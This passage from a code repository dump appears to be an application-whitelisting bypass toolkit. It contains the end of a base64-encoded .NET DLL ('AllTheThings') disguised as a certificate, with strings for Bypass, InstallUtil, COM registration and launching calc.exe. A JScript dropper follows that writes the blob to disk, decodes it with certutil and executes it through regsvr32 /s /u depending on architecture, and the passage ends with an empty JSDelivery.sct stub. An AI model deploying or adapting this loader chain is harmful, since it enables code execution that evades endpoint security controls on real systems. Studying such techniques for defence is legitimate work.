202 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
203 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
204 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
205 | AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAABIAAAAAgAFAIghAACQDAAA\
206 | CAAAAAAAAAAAAAAAAAAAAGAgAACAAAAAAAAAAAAAAABALgAACAAAAAAAAAAAAAAA\
207 | AAAAAAAAAAAAAAAAAAAAAOhao1eKooGq53BL1Fbcu3p77QlcOUUVy/of55ks/6bI\
208 | FLQyC2BriJt7OZg3IrSycnsaTdZypyTHYQcTY+CEChGhvOawFJc/zUHdTyRM8Ijj\
209 | ceCAC86t3XzNum18Phy/AJFVevIeGQPdMoaJan0SJGkfPcXHZmnPS9ygFX/lkX8E\
210 | LnIBAABwKBAAAAoqHgIoEQAACipecxIAAAolck0AAHBvEwAACigUAAAKJioeAigR\
211 | AAAKKkJyXwAAcCgQAAAKKAMAAAYqHgIoFgAACipGAigaAAAKcpUAAHAoEAAACipC\
212 | csUAAHAoEAAACigDAAAGKkJy+wAAcCgQAAAKKAMAAAYqGigDAAAGKhooAwAABioa\
213 | KAMAAAYqGigDAAAGKh4CKBEAAAoqAAAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAz\
214 | MTkAAAAABQBsAAAA5AMAACN+AABQBAAAqAQAACNTdHJpbmdzAAAAAPgIAABEAQAA\
215 | I1VTADwKAAAQAAAAI0dVSUQAAABMCgAARAIAACNCbG9iAAAAAAAAAAIAAAFHFQAA\
216 | CQAAAAD6JTMAFgAAAQAAACAAAAAGAAAADgAAAAcAAAAcAAAAFwAAAAEAAAAEAAAA\
217 | AADJAwEAAAAAAAYAKgAKAAYAUAAKAAoAiABuAAoApwBuAAoAuABuAAYA7ADaAAYA\
218 | AwHaAAYAIAHaAAYAPwHaAAYAWAHaAAYAcQHaAAYAjAHaAAYAxgGnAQYA2gGnAQYA\
219 | 6AHaAAYAHwIFAgYAPwI4AgYARgI4Ag4AawJYAg4AiQJYAhIAtAKXAg4A1AK+AgYA\
220 | /QLqAgoACQNuAAYAGwOnAQYAMwOnAQYARgOnAQoAVgNuAAoAawNuAAYAfQOnAQYA\
221 | mgOnAQYAuQMKAAAAAAABAAAAAAABAAEAAQAQAOMDAABFAAEAAQABABAA6wMAAEUA\
222 | AQADAAEAEADyAwAAVQABAAUAAQAQAPkDAABhAAEABwAAABAAAAQAAEUAAQALAOAg\
223 | AAAAAJYACASbAAEA7CAAAAAAhhhKAAYAAQD0IAAAAACWAA0EmwABAAwhAAAAAIYY\
224 | SgAGAAEAFCEAAAAAxgASBJ8AAQAlIQAAAACGGEoABgACAC0hAAAAAIYYSgAGAAIA\
225 | PyEAAAAAlgAnBBoAAgBQIQAAAACWADkEGgADAGEhAAAAAIYADQQGAAQAaCEAAAAA\
226 | lgBJBKoABABvIQAAAACWAHQEtQAIAHYhAAAAAJYAhgS1AAgAfSEAAAAAhhhKAAYA\
227 | CAAAAAEAHAQAAAEANQQAAAEANQQAAAEAVAQAAAIAWQQAAAMAXwQAAAQAawQJAEoA\
228 | AQARAEoABgAZAEoACgApAEoAEAAxAEoAFQA5AEoAFQBBAEoAFQBJAEoAFQBRAEoA\
229 | FQBZAEoAFQBhAEoAFQBpAEoAEABxAEoAFQB5AEoAFQCBAEoAFQCRAE4CGgCJAEoA\
230 | BgCZAEoABgCZAHwCFQChAJECHwCxAEoAEACpAEoABgDJAEoAJgDZAEoAFQDhAEoA\
231 | LADBAEoABgDxAEoABgD5AEoABgAuACMAjwEuAHsA9gEuAAsAXgEuABMAZwEuABsA\
232 | hgEuACsAlQEuADMAjwEuADsAjwEuAEMAjwEuAEsAlQEuAFMApwEuAFsAjwEuAGMA\
233 | jwEuAGsAvwEuAHMA6QGDAKsARACjALsAdACjAMMAfQCjAGsASgCjAMsAkgCjAGMA\
234 | RAAAAdsApQAgAeMApQAEgAAAAQAAAAAAAAABAAAAvACaBAAABAAAAAAAAAAAAAAA\
235 | MgDaAwAAAAAEAAAAAAAAAAAAAAA7AG4AAAAAAAQAAAAAAAAAAAAAADIAOAIAAAAA\
236 | BAAAAAAAAAAAAAAAOwCXAgAAAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1l\
237 | LkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0\
238 | ZQAuY3RvcgBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uRW50\
239 | ZXJwcmlzZVNlcnZpY2VzAEFwcGxpY2F0aW9uQWN0aXZhdGlvbkF0dHJpYnV0ZQBB\
240 | Y3RpdmF0aW9uT3B0aW9uAEFwcGxpY2F0aW9uQWNjZXNzQ29udHJvbEF0dHJpYnV0\
241 | ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2Vt\
242 | Ymx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0\
243 | cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RB\
244 | dHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFk\
245 | ZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENv\
246 | bVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJz\
247 | aW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVGFyZ2V0RnJh\
248 | bWV3b3JrQXR0cmlidXRlAFN5c3RlbQBPYmplY3QAQ29uc29sZQBXcml0ZUxpbmUA\
249 | U3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NTdGFydEluZm8Ac2V0X0ZpbGVOYW1l\
250 | AFByb2Nlc3MAU3RhcnQAU3lzdGVtLkNvbmZpZ3VyYXRpb24uSW5zdGFsbABJbnN0\
251 | YWxsZXIAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFJ1bkluc3RhbGxlckF0dHJpYnV0\
252 | ZQBTeXN0ZW0uQ29sbGVjdGlvbnMASURpY3Rpb25hcnkAU2VydmljZWRDb21wb25l\
253 | bnQAQ2xhc3NJbnRlcmZhY2VBdHRyaWJ1dGUAQ2xhc3NJbnRlcmZhY2VUeXBlAFBy\
254 | b2dJZEF0dHJpYnV0ZQBUcmFuc2FjdGlvbkF0dHJpYnV0ZQBUcmFuc2FjdGlvbk9w\
255 | dGlvbgBDb21SZWdpc3RlckZ1bmN0aW9uQXR0cmlidXRlAENvbVVucmVnaXN0ZXJG\
256 | dW5jdGlvbkF0dHJpYnV0ZQBDYWxsQ29udlN0ZGNhbGwAQWxsVGhlVGhpbmdzLmRs\
257 | bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
258 | TWFpbgBFeGVjAFVuaW5zdGFsbABzYXZlZFN0YXRlAFJlZ2lzdGVyQ2xhc3MAa2V5\
259 | AFVuUmVnaXN0ZXJDbGFzcwBFbnRyeVBvaW50AGh3bmQAaGluc3QAbHBzekNtZExp\
260 | bmUAbkNtZFNob3cARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZl\
261 | cgBBbGxUaGVUaGluZ3MAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
262 | LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
263 | YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
264 | IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
265 | QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
266 | ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
267 | dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
268 | AQAAAB4zgqE0xlNCjdJI5PE1tnEABCABAQgDIAABBSABARERBCABAQIEIAEBDgQA\
269 | AQEOBgABElESTQUgAQERaQUgAQERdQi3elxWGTTgiQiwP19/EdUKOgUBAAEAACkB\
270 | ACQzMUQyQjk2OS03NjA4LTQyNkUtOUQ4RS1BMDlGQzlBNTE2ODAAAAgBAAAAAAAA\
271 | ABQBAA9kbGxndWVzdC5CeXBhc3MAAAgBAAMAAAAAAAMAAAEFIAEBEl0EAQAAAAoA\
272 | BCCAgQEYGA4IBgAAIICBAYCgACQAAASAAACUAAAABgIAAAAkAABSU0ExAAQAAAEA\
273 | AQALQR1gd6ckoaTJoYdu3Tbzd/Munbs0UEf05nIsjyf4fvPHfASpD2Yi9OUqhVDo\
274 | nptUQNXJSz30AxhpDekVvQPzsd2UXd1quH28rmhCh9MI9Y70ejbk1Uq1VnazOj1Q\
275 | 1KZPYpfikbWNmiP8LITaM2XQ5TDjYFUoJ/4LxDQ/ZqzYswgBAAgAAAAAAB4BAAEA\
276 | VAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQABAAAAAAAFAQAAAAARAQAMQWxs\
277 | VGhlVGhpbmdzAAAXAQASQ29weXJpZ2h0IMKpICAyMDE2AAApAQAkMDU0N2ZmNDAt\
278 | NTI1NS00MmEyLWJlYjctMmZmMGRiZjdkM2JhAAAMAQAHMS4wLjAuMAAATQEAHC5O\
279 | RVRGcmFtZXdvcmssVmVyc2lvbj12NC41LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlO\
280 | YW1lFC5ORVQgRnJhbWV3b3JrIDQuNS4yAABIoQBAAIABAAAA/+BIoQhAAIABAAAA\
281 | /+BIoRBAAIABAAAA/+AAAABAAAADAAYAcC4AAAAAAAAAAAAAji4AAAAgAAAAAAAA\
282 | AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1z\
283 | Y29yZWUuZGxsAAAAAABIoQAgAIABAAAA/+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
284 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
285 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
286 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
287 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
288 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
289 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
290 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGAAAAAAwAAAYAAAAA\
291 | DQAABgAAAAAAAAAAvH9+VwAAAACPQAAAAAAAAAMAAAADAAAAQEAAAExAAABYQAAA\
292 | Gi4AACYuAAAyLgAAXkAAAHBAAACEQAAAAQACAAAARGxsUmVnaXN0ZXJTZXJ2ZXIA\
293 | RGxsVW5yZWdpc3RlclNlcnZlcgBFbnRyeVBvaW50AFxBbGxUaGVUaGluZ3MuZGxs\
294 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
295 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
296 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
297 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
298 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
299 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
300 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
301 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
302 | AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
303 | AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
304 | vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
305 | AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
306 | bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
307 | ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
308 | bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
309 | AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
310 | bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
311 | bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
312 | YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
313 | AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
314 | dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
315 | YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
316 | YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
317 | AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
318 | ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
319 | MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
320 | bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
321 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
322 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAEAAAAByuKK40rqCu\
323 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
324 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
325 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
326 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
327 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
328 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
329 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
330 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
331 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
332 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
333 | AAAAAAAAAAAAAAAAAAAAAA==\
334 | -----END CERTIFICATE-----"
335 |
336 |
337 | var WshShell = new ActiveXObject("WScript.Shell");
338 | var WshProcEnv = WshShell.Environment("Process");
339 | var process_arch = WshProcEnv("PROCESSOR_ARCHITECTURE");
340 | WScript.Echo(process_arch);
341 |
342 | if(process_arch == "AMD64")
343 | {
344 | SaveStringToFile("AllTheThingsx64.txt", x64dllEncoded);
345 | var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx64.txt x64.dll");
346 | var execFilex64 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x64.dll");
347 | }
348 | else
349 | {
350 | SaveStringToFile("AllTheThingsx86.txt", x86dllEncoded);
351 | var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx86.txt x86.dll");
352 | var execFilex86 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x86.dll");
353 | }
354 |
355 | WScript.Echo("Done ;-)");
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
--------------------------------------------------------------------------------
/JSDelivery.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
374 |
375 |
376 |
--------------------------------------------------------------------------------